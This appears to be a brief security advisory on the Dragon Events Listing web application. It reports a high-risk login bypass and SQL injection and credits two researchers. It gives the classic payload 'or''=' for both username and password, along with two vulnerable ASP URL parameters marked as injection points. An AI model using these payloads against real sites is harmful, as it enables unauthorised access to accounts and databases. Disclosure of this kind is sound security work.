vendor site:http://www.dragoninternet.net/ product:Dragon Events Listing bug:login bypass & injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql (get) http://site.com/event_searchdetail.asp?ID='[sql] http://site.com/venue_detail.asp?VenueID='[sql] laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@xxxxxxxxx